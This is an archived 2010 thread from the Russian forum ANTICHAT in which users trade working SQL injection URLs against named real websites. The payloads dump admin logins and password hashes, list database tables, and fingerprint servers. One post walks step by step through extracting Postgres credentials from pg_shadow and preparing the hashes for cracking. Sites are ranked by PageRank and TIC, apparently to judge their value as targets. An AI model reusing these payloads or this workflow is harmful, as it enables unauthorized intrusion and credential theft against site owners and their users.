ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.07.2010, 00:23
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
Код:
www.jieyanbar.com/jycs.look.php?ID=286 +union+select+1,%String_Col%,3,4,5--
Host IP: 114.113.148.1
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: mlyjy
Код:
topic.0731fdc.com/Mascot/look.php?id=4+union+select 1,2,%String_Col%--
Host IP: 222.240.149.26
Web Server: Apache/2.2.14 (Unix)
Powered-by: PHP/5.2.11
DB Server: MySQL >=4.1
Current DB: 0731fc
Код:
www.lisenok.ru/look.php?id=1781 UNION ALL SELECT %String_Col%,2,3,4,5--
Host IP: 194.135.105.50
Web Server: Apache/1.3.41 (Unix) PHP/5.2.5
Powered-by: PHP/5.2.5
DB Server: MySQL
Current DB: db_lisenok1
Код:
www.tunahan.org/look.php?bolm=basin&id=3 UNION ALL SELECT 1,%String_Col%,3,4,5,6--
Host IP: 38.113.1.176
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: suleyman
Код:
www.spravkatver.ru/look.php?cat_id=19&c_id=362&id=3449 AND %True_Expression%
Host IP: 77.221.130.43
Web Server: nginx/0.6.32
Powered-by: PHP/5.2.6-1+lenny8
DB Server: MySQL
Current DB: ),$
Код:
www.xmkj.net/look.php?id=45457 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Host IP: 121.199.124.72
Web Server: Apache/2.0.59 (Unix) DAV/2 mod_jk/1.2.26
Powered-by: PHP/4.4.9
DB Server: MySQL unknown ver
Current DB: zky081_db
Код:
www.stalpraas.com/eng/look.php?id=107 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14--
Host IP: 85.17.197.141
Web Server: Apache/2
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: stalpraa_website
Код:
www.diysuits.com/look.php?id=513 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--
Host IP: 69.163.226.1
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: frsuitssql |
|
|
21.07.2010, 03:57
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
https://ws1.gaslightmedia.com/tomsmoms/retail_shop/display_product.phtml?cust_id=&user_num=&cust_stat us=guest&zip=&prod_id=4+union+select+null,null,nul l,null,null,null,null,version()::int--+
|
|
|
|
21.07.2010, 10:59
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
--Боян--
http://www.supplierdiversityeurope.eu/news_details.php?id=-82+union+select+1,group_concat(0x0b,username,0x3a, password),3,4,5,6,7,8,9,10,11,12,13+from+SDE_users--
http://www.dulam.com/news_details.php?id=-9+union+select+1,2,3,group_concat(0x0b,Username,0x 3a,Password),5,6,7,8+from+dulam_admin--
http://www.businessanalytica.ru/ru/news/news_details.php?id=-66+union+select+1,2,3,4,group_concat(0x0b,table_na me)+from+information_schema.tables--
http://www.melker-online.de/addinol/news_details.php?id=-14+union+select+1,2,3,4,group_concat(0x0b,table_na me),6+from+information_schema.tables--
http://www.a1accommodation.com.au/news_details.php?id=-11+union+select+1,2,3,4,group_concat(0x0b,table_na me),6+from+information_schema.tables--
http://www.abraxascorp.com/news_details.php?id=-12+union+select+1,2,group_concat(0x0b,admin_login, 0x3a,admin_pass),4,5+from+admin--
|
|
|
|
21.07.2010, 15:20
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
newmexicohistory.org пр6 тиц10
Код:
http://www.newmexicohistory.org/filedetails.php?fileID=23133+union+select+1,2,3,4,concat_ws(0x3a3a,user_name,password)+from+adminUser+--+
gloriousindia.com пр2
Код:
http://www.gloriousindia.com/unleashed/place.php?id=-228659+union+select+1,concat_ws(0x3a3a,email,password,name,pwd),3,4,5,6,7,8,9,10+from+user+--+
celadon-international.com пр3 тиц10
Код:
http://www.celadon-international.com/place.php?id=-38+union+select+concat_ws(0x3a3a,username,password)+from+wh_users+--+
finance.tut.by пр5 тиц170
Код:
http://finance.tut.by/insurance.php?mode=company&id=-1'+union+select+1,2,concat_ws(0x3a3a,id,username,password,email,type),4,5,6,7,8,9,10,11,12,13+from+users+limit+1,100+--+
10.of.by пр5 тиц210
Код:
http://10.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbmV9pz_pz_pz_&md=shop_newsline&news_id=-2272'+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+group+by+table_schema+limit+2,1+--+
|
|
|
|
21.07.2010, 16:34
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.galeriapresenca.pt/site/index.php?pag=noticias&subpag=detalhe&id=51+union+ select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+ from+pg_user--
|
|
|
|
21.07.2010, 16:56
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Код:
http://www.davico.co.uk/catalogue.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,concat_ws(char(58),version(),user(),database(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9--+
Version: 5.0.83-community-nt
User: davico@localhost
Database: davico
Os: Win32 |
|
|
|
21.07.2010, 17:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://rantburg.com PR-6
// смотрим версию Postgre
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version () as int)+from+pg_user&D=2006-01-30&SO=&HC=1
// смотрим доступ к pg_shadow
http://rantburg.com/poparticle.php?ID=141137+union+select+version()::i nt+from+pg_shadow&D=2006-01-30&SO=&HC=1
//круто! есть доступ к pg_shadow, попробуем вытащить логин и пароль
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename ||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1
з.ы хочу напомнить что первые три символа xэша это алгоритм шифрования, в нашем случаe md5, при расшифровке нужно это вырезать
|
|
|
|
21.07.2010, 21:35
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
http://www.dwstadium.co.uk/suite.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
PR-5
http://www.analisi.ru/info.php?id=-7+union+select+1,group_concat%28column_name%29,3,4 %20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TAB LE_NAME=0x70687062625f61636c5f7573657273%20--
PR-60
ТИЦ-3
|
|
|
|
21.07.2010, 23:23
|
|
Новичок
Регистрация: 24.01.2009
Сообщений: 10
Провел на форуме:
72528
Репутация:
1
|
|
Скуля:
Код:
http://www.kuroed.com/?id=158
Колонка: 1
Юзер: kuroed@localhost
Версия: 4.1.22-log
тИЦ: 90 |
|
|
|
22.07.2010, 11:23
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
http://www.alphaonenow.org/info.php?id=-57+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%2 8column_name%29,2,3,4,5,6,7,8,9,0,1,2%20FROM%20INF ORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x766 25f61646d696e6973747261746f72%20--
PR-4
http://www.fourstarrealty.com/agent.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8%20--
PR-3
ТИЦ-10
http://www.premiermontreal.com/agent.php?id=-37+union+select+1,2,3,4,5%20--
http://www.rav-riders.com/doc/motos/moto.php?id=-13+union+select+1,2,user(),4,5,6,7,8,9,0,1,2 --
PR-1
http://www.bullster.com/en/catalogue-moto.php?id=-93312+union+select+1,2,3,4%20--
PR-2
http://katalog.motorky.com/moto.php?id=-98+union+select+1,concat_ws%280x3a,id,username,pas sword%29,3,4,5,6,7,8,9+from+moto_users%20--
PR-4
http://www.banzai-moto.com/concession_kawasaki/banzai-fiche-moto.php?id=-54+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4%20--
PR-1
http://www.fcl.ru/filial.php?id=-2+union+select+1 --
PR-1
ТИЦ-10
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
